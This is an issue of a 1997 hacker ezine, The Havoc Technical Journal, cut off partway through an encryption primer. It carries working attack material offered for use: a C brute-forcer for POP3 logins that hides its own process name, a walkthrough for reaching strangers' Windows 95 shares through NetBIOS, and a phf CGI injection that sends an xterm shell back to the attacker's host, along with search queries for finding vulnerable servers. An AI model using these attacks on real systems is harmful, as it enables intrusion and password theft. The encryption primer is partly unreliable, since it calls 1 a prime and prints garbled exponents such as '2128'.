ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³Vol. 2 No. 2 The Havoc Technical Journal Issue 14³± ³ - http://www.thtj.com - ³± ³ September 1, 1997 - A Havoc Bell Systems Publication ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ úTHTJ - Writing text files like they're going outta styleú ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ú-=³THTJÄÄÄ[14]ÄÄÄÄContentsÄÄÄÄ[14]ÄÄÄTHTJ³=-ú ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Editorial..............................Scud-O Spreading the knowledge................KungFuFox Pop3.c mail port hacker................memor Securing your WWWBoard.................Black Sol Hacking Win95 With NBTSTAT.............W3|rd More on cgi-bin holes..................]NiCK[ Encryption for dumbasses...............t33 More info on X.25 than the CIA has!....memor Beyond HOPE review.....................AlienPhreak Tatoo pager info and more..............memor Help-a-phreak..........................THTJ Oddville, THTJ.........................Scud-O The News: HOPE, AOL Haxors, & SPAM!....KungFuFox Logs...................................THTJ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ thtj.com is proud to now be hosting ³ ³ global kOS - http://www.thtj.com/kOS/³ ³ check it out. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³The Havoc Technical Journal - contacts & information ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ - Editor in Chief : Scud-O, scud@thtj.com - Assistant Editor : KungFuFox, mazer@cycat.com - Submissions Editor: Keystroke, keystroke@thepentagon.com - thtj email address: thtj@thtj.com - thtj website: http://www.thtj.com/ - thtj mailing address: PO BOX 448 Sykesville, MD 21784 The Havoc Technical Journal Vol. 2, No. 2, September 1st, 1997. A Havoc Bell Systems Publication. Contents Copyright (©) 1997 Havoc Bell Systems Publishing. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of Havoc Bell Systems Publishing. [No copying THTJ, damnit.] The Havoc Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. For information about using articles published in THTJ, send mail to: E-mail: thtj@thtj.com US-mail: THTJ c/o HBS, PO Box 448, Sykesville, MD 21784 ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Editorial by Scud-O ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ I'm taking a break from writing an editorial this month because I've been especially busy with THTJ for most of August, cya next month. Scud-O ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ /--------/ -of Havoc Bell Systems- scud@thtj.com | http://www.thtj.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Spreading the knowledge - by KungFuFox ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ It's survived for 14 issues, the first 3 spoken of only in legend. It's succeeded where others have failed. It's stood the test of time. It's past its first birthday. Hooray for THTJ. A lot goes into making a publication like this, and even more goes into putting it out on time. Funny how that's not the norm in the world of ezines, coming out on time. I guess it's the pressure of a deadline that's scared people away from the idea. Taking a look at the booming industry of ezines out there, I can't help but notice that not many of them make it very far. For whatever reason, they fall below the horizon far sooner than they should. Maybe the initial motivation to make the zine was no longer there, or maybe the editors didn't get enough articles to keep publishing; something just didn't go right. They all started off with the same goal, to bring information to the public. I think it's noble that people are still out there trying to spread the knowledge, because I think that's what ezines are for. They help the community by giving them the knowledge that they would have a great deal of trouble getting otherwise. As I reflect on the maturity of THTJ, on the changes it's gone through over time, I do feel a good deal of pride in its success. From its early days of paper form, through its evolution as an ezine, and to the present point, its message has stayed the same; spread the knowledge. We spread the knowledge every month, with the seemingly endless stream of articles that are sent in from everyday people like you, from the community. We sure as hell couldn't survive without the help of our reader/writers. This zine has kept going because the idea of spreading the knowledge isn't extinct, and hopefully it never will be. That's what freedom of speech is all about, isn't it? Not about burning flags, or dressing in drag, or whatever. It's about being able to exchange information without barriers, without censors, without the challenge of fighting your allies to learn. If there were no ezines, if nobody out there had the motivation to spread the knowledge, if it was an every man for himself community, we'd be censoring ourselves by holding the knowledge away from the people who want it, who can use it. Zines like Phrack and PLA have kept the scene informed, and laughing, for the duration of this decade (and in the case of Phrack, for a good chunk of the 80s as well). It is their success that has brought many a newbie into the scene, just because of the openness and freedom of knowledge exchange that these zines have promoted. Though 2600 is not an ezine, and not free, it has kept the public informed for many years. It has also indirectly influenced the ezine industry for some time now, forcing those who want the knowledge to stay free to make their own ezines, and keep the knowledge flowing. Many a zine have come and gone, making maybe 1, maybe 2 issues. And of those many, perhaps 1 in 20 of them makes a 3rd, and a 4th, and keeps the knowledge flowing, but just 1 out of 20 is all it takes to keep the scene alive. There are some newcomers out there, starting out like the many before them, and they're continuing the tradition, taking over where others have left off. Zines like System Failure, Zero, Ocean County Phone Punx, and Confidence Remains High. They all show promise, and I'm sure there are many more like them that I don't even know about. It can only be hoped that this trend of knowledge spreading never ends, and should it ever, by the hand of some contemptuous hypocrite, we'll not be the disgraced for trying. The Havoc Technical Journal is going to continue to spread the knowledge for as long as it can, but nothing lasts forever, and times do change. We're aiming to better ourselves, to make this publication as informative, as interesting, and as entertaining as possible. The opinions of our readers are the best way for us to judge our strengths, our weaknesses, to determine what it is we're doing right, and what it is we need to be doing. Flame us if necessary, just let us know what you want to see, what you don't want to see and what it is you see that you think is really swell. Operators are standing by! KungFuFox ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Pop3.c mail port hacker - by memor ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ /* A little pop3 "hacker" by memor Sends a USER username and PASS username to a pop3 server on port 110 read from a passwd file on the target server. (I guess that passwd file is shadowed and you are trying to gain access to some joe accounts) Compile it with cc -o pop3 pop3.c Usage: pop3 server-ip passwdfile port(optional) Tested on linux 2.0.30 */ /* Includes for File managing, String managing.. Default c commands, exit commands, socket managing */ #include #include #include #include #include #include #include #include #include /* Defining Global variables */ /* Defining a socket, a string, 2 functions */ FILE *soc; char *str; int sock; void answer(); void sending(); /* main routine */ int main(int argc, char *argv[]) { /* defining a for the users counter, strr as a string for containing username, port, count as file counter, structure for socket */ int a; FILE *userfile; char *strr; char *ips; int count, port = 110; struct sockaddr_in ip; /* space in the 3 strings.. */ str = (char *)malloc(100); strr = (char *)malloc(100); ips = (char *)malloc(100); /* you need more arguments if you want it to work.. server port is not needed cause pop is on port 110 */ if ( argc < 3 ) { printf("Usage: %s (ip of pop3 server) (userfile) (server port)\n", argv[0]); exit(1); } else if ( argc > 2 ) { if(argc > 3) port = atoi(argv[3]); /* if port argument defined */ userfile = fopen(argv[2],"r"); /* opening the userfile */ if(userfile == NULL ) /* is the userfile open? */ { printf("Userfile doesnt exist..\n"); exit(1); } } /* argv[1] -> ips.. so i'll nuke argv [1] and the others argv for hiding all of that now :) */ strcpy(ips,argv[1]); /* now i hide all as some man using.. */ sprintf(argv[0],"man "); sprintf(argv[1]," "); sprintf(argv[2]," "); if(argc>3) sprintf(argv[3]," "); do /* lets begin a loop for userfile reading */ /* open a socket for connecting */ { if ( (sock = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) /* i cant open it */ { perror("socket"); exit(0); /* bye */ } /* i need to read you as a file, miss socket */ soc=fdopen(sock, "r"); /* fill target address structur */ ip.sin_family = AF_INET; ip.sin_port = htons(port); ip.sin_addr.s_addr = inet_addr(ips); bzero(&(ip.sin_zero),8); /* counters are 0 now.. but in a few ? ;) */ a=0; count=0; do /* lets begin to get an username */ { strr[count]=fgetc(userfile); /* i catch a caracter in the file */ if(strr[count]==':') /* is it a ':' ? */ { strr[count]='\0'; a=1; /* it is a ':' so i'll forget to get the others caracters */ } if(strr[count]==13) strr[count]='\0'; /* it is a 13? ok.. i forget it too */ strr[count+1]='\0'; /* i make my string */ count++; /* counting for filling strr */ } while(strr[count-1]!=10 && strr[count-1]!=EOF); /* stop if we find the lf or end of file caracters */ if(strr[count-1]!=EOF && strlen(strr)>1) /* is my username > 1 caracter and am i not at the end of file ? */ { if(strr[count-1]==10) strr[count-1]='\0'; /* if i see a lf, i kill it*/ printf("Username attempt: ->%s<-\n",strr); /* what is the username trying */ sprintf(str,"USER %s\n",strr); /* copy the USER name in str */ /* connect to the pop3 server */ if ( connect(sock, (struct sockaddr *)&ip, sizeof(struct sockaddr)) < 0 ) /* i cant connect it? */ { perror("connect"); exit(1); /* bye bye .. :) */ } /* so i can connect it that mean if i am here.. */ else { /* server is talking.. */ printf("Server.. hello..\n"); answer(); /* please tell me what does the server says */ printf("%s",str); /* now i send that USER name*/ sending(); /* sending it.. */ printf("Server is answering..."); answer(); /* answer +OK from the server i guess */ sprintf(str,"PASS %s\n",strr); /* i'll send now that PASS name i first fill str with it*/ printf("%s",str); /* ok i am ready to send it */ sending(); /* sending it .. */ printf("Server is answering..."); answer(); /* i am receiving or a +ERR or a +OK i guess */ printf("Ok finish for that ROUND.. \n"); /* finished that round*/ close(sock); /* closing that socket */ } } }while(strr[count-1]!=EOF); /* im not at the end of file? so i continue */ } /* sending string str */ void sending() { if ( send(sock, str, strlen(str), 0) < 0 ) /* can't i send str ? */ { perror("send"); exit(1); /* i cant, so see you later */ } } /* receiving caracters from the server */ void answer() { /* first.. a caracter is a char type.. */ char ch; do { /* begin receiving caracters */ ch=getc(soc); printf("%c",ch); /* please tell me what the server says */ } while(ch!='\r'); /* ok i received a 13.. i guess he wont talk anymore now.. i hope */ printf("\n"); } ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Securing your WWWBoard - by Black Sol ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Note: this is intended for those with their own websites; and use Matts WWWBoard CGI Script (http://www.worldwidemart.com/scripts) This is a perl script for a message board system, and as all programs, carries bugs which can be easily exploited. If you have this perl script running on your site, or plan on it, this text may be almost necessary for its safety. Well, more and more sites these days appear to have the WWWBoard script which allows any person to post a message to your board, and let others read it. This is considered a very convenient tool, but, as everything, has flaws and can be exploited. The first part of this is the security issue brought up with the associated WWWAdmin program that goes with WWWBoard, and second, an issue of editing the PERL Script itself for better security. WWWAdmin Hole: | ---------------+ The Exploit: Used to remove messages from your board, WWWAdmin is used very commonly when a person uses WWWBoard. The default file name is /wwwboard_Directory/wwwadmin.cgi or www.admin.pl You also must have a user name and password, which is stored in the passwd.txt file. This can be a very big problem. The method WWWAdmin uses to encrypt the password is the same as normal unix passwords, so therefore, password crackers, like CrackerJack or John the Ripper can be used to crack it. The way it is displayed is this: WebAdmin:aepTOqxOi4i8U WebAdmin is the username and aepTOqxOi4i8U is the encrypted password. If you put this into unix format, lets say.. WebAdmin:aepTOqxOi4i8U:275:15:Emmanuel Goldstein:/usr/homos/egold:/bin/csh and then, used sturdy old John the Ripper to crack it, you'd come up with the password WebBoard. Then, you'd just have to go to lets say www.host.com/wwwboard/wwwadmin.cgi or wwwadmin.pl and use WebAdmin and WebBoard as the password, and you can edit and delete all their stuff.. How to Fix it: Don't panic because you might get hacked by some ego-maniac kid hacker who doesn't have anything better to do then ruin other peoples fun, this can be easily fixed. There are several methods, i suggest using all of them for maximum security. Method #1 - Don't use the standard wwwadmin.pl or wwwadmin.cgi for the name. Use some random numbers and letters when uploading this to your server, for instance, make it wadawambrblah.cgi. This way, only you will even know where the admin script is, so even if they get the password they won't know where to go! Method #2 - Don't use the standard passwd.txt for the passwd file. Change it also to something random like sdihff.bla - NOTE - you must also make this change in the WWWAdmin script, under the location for your passwd file. More details in the WWWAdmin readme file.. Method #3 - As soon as you upload it, IMMEDIATLY change the username and password! And do not use common words, most words can be found in wordlists, which basically means, you can still get hacked..use random names, like ajgndnbvfd for the password, etc. etc., you get the point (i hope). Make it LONG and use numbers as well, like a4mg4msdfsd9as9. Note - be sure to keep your passwords written down, so you can remember them! Method #4 - When you change your password, make sure it is more then 8 letters+numbers. Password crackers crack up to 8 characters, so, if your password is longer then that, and someone gets your password file; they can only crack the first 8 letters/numbers, and they can't get the rest of the password. Method #5 - Modify your PERL script so only ip's from your ISP (internet service provider) can access the wwwadmin script, whatsoever. Note - more on this below! Method #6 - Chmod your passwd text file and even wwwadmin cgi script so that nobody can access it, and then when you need to use it, you can chmod it back to world readable/executable. For example, log in to your shell, and then do the following: -+- cd wwwboard (wwwboard being the name of the dir everything is in) chmod o-rwx passwd.txt (passwd.txt being the name of the passwd file for wwwadmin) chmod o-x wwwadmin.cgi (wwwadmin.cgi being the name of the wwwadmin script file) -+- That's all. now if someone tries to access your WWWAdmin or your password file, they will get a Forbidden Access error. However, so will you. So, when you want to use your wwwadmin script, go back to your shell and do this: -+- cd wwwboard chmod o+rwx passwd.txt chmod o+x wwwadmin.cgi -+- Its as simple as that. Modifying the PERL Script for more security: | ----------------------------------------------+ In most situations, people using WWWBoard do not know PERL, the programming language that it is written in. Knowing PERL can benefit you greatly. What are some things you could do if you knew how to edit the perl script? 1) Ban certain people from using your board 2) Ban all people from a certain internet provider from using your board 3) Stop other people from using your nickname/handle 4) Record the IP, Internet Address, Web Browser, time and date, and the message that person posted; to a file each time somebody posts. 5) Change the background colors, background appearance, and the general appearence, and layout of the board to YOUR liking. 6) Display information such as a persons IP and web browser in their post. 7) Require a username and password to make posts. 8) Stop other people from accessing your WWWAdmin script. Unfortunately, to describe how to actually DO those things it'd take another text in itself :) You can check out this site for some pointers with perl: http://www.ora.com/catalog/pperl2/excerpt/ch01-01.htm Until then, I can include one method you can use. It is pretty easy to include somebodies IP or host in a post. Start off with these two lines, in the top, with the other variables: # Start perl sample $host = $ENV{'REMOTE_HOST'}; $ip = $ENV{'REMOTE_ADDR'}; # End perl sample Those two lines will put the persons IP and host into two little variables. Now, in the procedure where it writes to the html file, you can include those two variables to display the poster's info. The procedure to put this into is new_file If your unsure of where to put this, just look for a print NEWFILE "blah blah\n"; statement..you can look for where it says something like "posted by $name" or whatever, and you can just add $host or $ip into the line somewhere. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Hacking Win95 With NBTSTAT - by W3|rd ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Requirements for the hack to work: Windows 95 & the Victim must run NETBIOS and have "sharing" on their hard drives. First type 'nbtstat -A x.x.x.x' If your lucky you'll get something like this. NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- ^M0REBID <00> UNIQUE Registered VIRTUAL COMPUTE<00> GROUP Registered ^M0REBID <03> UNIQUE Registered MAC Address = 44-45-53-54-00-00 Remember the first UNIQUE name here. Now create 'lmhosts' in your windows dir. it should look like this: x.x.x.x ^M0REBID Then you purge nbtstat like this: 'nbtstat -r' Then goto Find -> Computers on the Start Menu in Windows 95. Type in the UNIQUE name and search. Then if found , double click on the name , and if you get up a window with for example C and D .. you will have Access to his harddrives.. ;) You may now read his/her files ... and remember be creative... ;) (But remember , some people might have sharing on..but with pwd!) Mission Accomplished... Thankz to: iO and ^D-BL00D^ (my Co-prez in NHF) W3|rd - Prez. of Norwegian Hacker Force, and a Rebel X Hacker. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ More on cgi-bin holes - by ]NiCK[ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 1 - The largest server database helps exploit phf ************************************************* I have appointed: ALTA-VISTA ! :) yeah ! if you know the syntax of this websearch well enough, you can succeed to have a list of more than 3000 insecure servers with this method, simply by typing: http://altavista.digital.com/cgi-bin/query?pg=aq&what=web&fmt=. &q=link%3A%22%2Fcgi-bin%2Fphf%22&r=&d0=&d1= (type this all in on one line) Too easy! Isn't it? Also, you can modify it to search for php.cgi, webgais, or others such as view-source... Note: Sometimes, some servers won't work... but its just because the database isn't updated every day. 2 - Other stuff to exploit websearchs ************************************* I love the "Yellow Pages" of organizations, enterprises, or companies like for instance Adminnet (www.adminet.com)... its filled with kewl insecure web servers.. But the problem is that it's not very interesting to scan manually... So, I wrote a little program to change the html index of web servers into a list of exploitable servers for phfscan or phpscan... Here is a little unix script: -- if [ $# = 0 ] then echo "Usage: html2list file.html" >&2 exit 1 cat $1 | grep '"http://' | tr '"' '\n' | grep '^http://' | cut -c8- |tr '/' '\n' |grep '\.' | grep -vi '\.html\|\.htm' |sort -u > $1.list (one again, the last 2 lines need to be moved up together) -- Note: You can change/update it to a better way of scanning... 3 - Xterm with phf ****************** Cracking the /etc/passwd ! ok... but there are better things to do than waste your time. This attack consists of using Xterm with phf. So, of course Xwindows must be present on the victim server, and you must also be running it. While in Xwindows, write this: 'xhost +www.victim.com' This is so your machine will accept connections from victim.com... You can simply type 'xhost +', but it isn't really secure... After, you must know what os www.victim.com is running, so you can guess the path of Xterm. Here are some default Xterm paths for a few systems: AIX : /usr/bin/X11/xterm HP-UX: /usr/bin/X11/hpterm Linux: /usr/X11R6/bin/xterm SunOS: /usr/openwin/bin/xterm You can also use: 'find /usr -name xterm' or again 'whereis xterm' if you have a shell on the machine. Finally, once you have found the path, you can run xterm via phf like: http://www.victim.com/cgi-bin/phf?Qname=a%0a/usr/openwin/bin/ xterm%20-display%20your.ip.com:0 (combine these two lines) Wait a few seconds... and whoop, a shell from the victims server will appear in your Xwindow. :) Usually you become an user Nobody, but sometimes, if the http daemon runs in a root shell, your become root, or www sometimes.. The best thing is that your access is not logged in the lastlog or wtmp... Very clean exploit ! Have PHFun ! :) -]NiCK[ ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Encryption for dumbasses - by t33 ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ This article is intended for the people who know shit about encryption and want a little more info about it. Hope it is useful. Contents: 1) What is Encryption? 2) How does Encryption work? 3) Brute Force Attack 4) Factoring Techniques 5) How Long Should a Key be? 6) Mounting an Attack 7) What is RSA? 8) What is DES? 9) What us Substitution? 10) What is Permutation? 1) What is Encryption? Encryption is simply the encoding of messages so that they cannot be read by anyone who does not know how to decipher it. Governments and militaries have been using codes to make their messages unreadable for many years. For example, Caesar used a code to send military messages that was simply a shift of the letters in the message three spaces down in the alphabet (an A becomes a D). In cryptographic language this is known as a shift cypher. The properties of a good cryptosystem are analogous to that of a normal lock. A good system will have a very large key which is one of a large number of keys (termed keyspace). It will also provide cyphertext (encrypted plaintext) that appears random and stands up to known decryption attacks. Lastly, the system should be suitable to the function for which it is intended. For example, if a message is to remain secret for ten years or more, then the system should take into account the future speed of computers and their corresponding ability to attack the system. However, except for classified government information (and maybe the Coca-Cola secret recipe), the reality is that the relevance of most corporate information traveling over networks is measured in days or weeks, and not decades. 2) How Does Encryption Work? Most encryption algorithms are based on the concept of complex mathematics that work in only one direction and are generally based on the difficulty of factoring very large numbers (keys) that are used for the encryption. These large numbers are the product of large prime numbers. For example, anyone can multiply two large prime numbers to obtain a result, but it is very difficult for someone else to factor the large number to get back the two primes. This is to say that mathematicians have yet to figure out a method for reversing the math effectively. In this way, cryptography has been a secure method of ensuring data confidentiality over computer networks. 3) Brute Force Attack The traditional method of breaking complex mathematical codes is through brute-force attacks. This method is mathematically the easiest to perform, but relies on vast computer processing power and is therefore the easiest to defend against. A brute force attack tries every possible combination of keys in order to unlock the encryption. Therefore, simply increasing the keyspace will increase the amount of time needed to mount a brute force attack. The reality is that a brute force attack is not a method which will ever be used to decode cyphertext. Some quick calculations relating computer speeds and key length will yield code-breaking times that exceed the expected life of the universe. The brute force method needs a sample of unencrypted text for the computer to compare each decryption attempt with the actual text. This can be easily obtained by knowing the nature of the messages being intercepted. For example, all Microsoft word files will have a set of standard information (bytes). How the decryption functions is easy. A key that is 128 bits long will have 2128 possible values. Therefore, assuming that a very fast computer that can try one million keys per second (consider that attempting a key requires many instructions) it will take 225 years to try all of the combinations with a 50% probability that it will be found in the first 224 years (remember that the universe is estimated to be 210 years old). (Bruce Schneier, Applied Cryptography c.1995). 4) Factoring Techniques The more feasible form of attack will come from mathematicians refining existing and developing new factoring techniques. These methods have been used to show potential vulnerabilities in key-based encryption. However, they still require massive computer power and long time-frames to break the encryption. For example, a 129-digit number was factored at Bellcore labs in 1994. This used the idle time on 1600 computers around the world, over a period of 8 months using a computation called the quadratic sieve. The authors estimated that they used .03% of the computing power of the Internet, and believed that, with a highly publicized event, they could acquire 100,000 computers (approx. 2% of the Internet) without resorting to illegal or unethical efforts such as an Internet worm. 5) How Long Should a Key be? The security of a cryptosystem depends on the strength of the algorithm and the length of the key. The strength of the algorithm is difficult to understand. However, understanding the methods of how the keys are decrypted provides some clues as to it's strength. Knowing that all numbers can be represented by a set of primes, encryption techniques rely on the difficulty of factoring very large numbers into their respective primes. Lets look at a very simplified example (cryptologists will undoubtedly cringe at the over simplification): Suppose we have number n represented by x and y such that n = xy. The quadratic sieve method works by first assuming that the numbers x and y are close to one another on a number line. Successive steps either prove or disprove this and search out the next numbers. Therefore, effective encryption will create keys which are not close to one another. However, the numbers cannot be so far apart as to have the one of x or y set to a very small value. Effective encryption-based key generation will generate the keys randomly, but also discard those keys which will be susceptible to factor-based decryption systems. What is involved in factoring a number? Anyone with a grade six education (or a calculator) can easily multiply together two numbers. Anyone with a grade 9 education (and who remembers it) can factor a small number into its primes. A prime number is any integer which is only divisible by itself and by 1. For example, the sequence of the first seven prime numbers is: 1,2,3,5,7,11,13... Lets say we express the number 24 as a set of its primes. This is simply 2*2*2*3 = 24. Seems simple enough. Now, for those of you who think this is easy, try entering the RSA factoring challenge and they will award you a prize if you can do it on very large numbers (see the link at the end of this document). Another method called the general number field sieve can factor numbers approximately 10 times faster than the quadratic field sieve, but is only faster for larger numbers (greater than 110 digits). This method hasn't been refined to the degree of the quadratic sieve but, with time will likely be the method of choice for factoring large keys. Factoring large numbers is very hard, but is becoming easier therefore predictions based on security required for long term encryption cannot be made. However, most people don't require their data to remain secure for 100 years. For example, information about stock market conditions may only be relevant for a few days. Decisions based on that information need only be protected for a few hours. At the end of the day everyone's trades become known anyway. For a manufacturer, design specs. need only be kept secret until product launch. For the longest-term secrets, such as military secrets, key length should be based on the computing speeds at that time and the projected future increases. Two general rules of thumb is that computing power increases by a factor of 10 every five years and it is always best to be cautious when making predictions. 6) Mounting an Attack With respect to computing methods, a hardware or a software based attack can be mounted. Hardware designers and cryptologists have designed machines specifically for breaking codes which can greatly increase the rate at which a code is broken. This involves hundreds of parallel processors working on different 'parts' of the key. A software-based attack is much slower but is also much cheaper to mount. For example, using an algorithm with a 56 bit key, a software attempt run on 512 workstations capable of running the algorithm at a rate of 15,000 encryptions per second, running 24 hours per day would require 545 years to test all possible numbers (Bruce Schneier, Applied Cryptography c.1995) . Importantly, with a 40 bit key (the only key length currently allowed for export under federal legislation) a similar network would take just under two days to complete the attack. A 128 key makes brute force cryptanalysis effectively useless, even when factoring estimates for increases in the number of networked computers in the world and increasing processor speed. However, it is still susceptible to factoring methods when distributed among several computers. The next logical question is, why not use keys with a very large number of bits (>2000)? The answer lies in the tradeoff between security and usability. The longer the key length the longer the time needed for encryption. Encryption over a LAN environment should not be a bottleneck in the communications. 7) What is RSA? RSA is the industry standard for public key cryptography. Its algorithm is based on the difficulty of factoring large numbers. Encryption is performed 'one-way', indicating that f(x) is the encryption function but f-1(x) is very hard to compute. 8) What is DES? Data Encryption Standard (DES) is the standard for private key encryption and is recognized by international standards organizations such as ANSI and ISO. Standard encryption schemes are needed to ensure interoperability of systems for the same reasons standards are needed for all network applications. The most important criteria for a standard (and in fact any) cryptographic scheme is that the security must rely on the key and not in the secrecy of the algorithm. By the definition of encryption, simply deducing the algorithm should not make it any easier to decrypt messages. DES uses the same key for encrypting as decrypting. This encryption is not based on the difficulty of factoring large numbers but is based on a set of non-linear transformations. The key can be any 56-bit number and there are few weak keys. A good example of a weak key is one that is all 0's or 1's. This encryption is not based on the difficulty of factoring large numbers but is based on a set of non-linear transformations. DES is a single combination of operations, substitution followed by permutation, performed on the message based on the key and on a set of constant values (the algorithm). This function is repetitive and so can be easily implemented using hardware, making it a very fast solution for encryption. 9) What is a Substitution? A substitution is quite easy to understand. Letters of the alphabet can be randomly substituted for other letters according to a key as follows: a b c d e f g... q s l b z e r... This substitution key is held by both the person coding the message and the person decoding 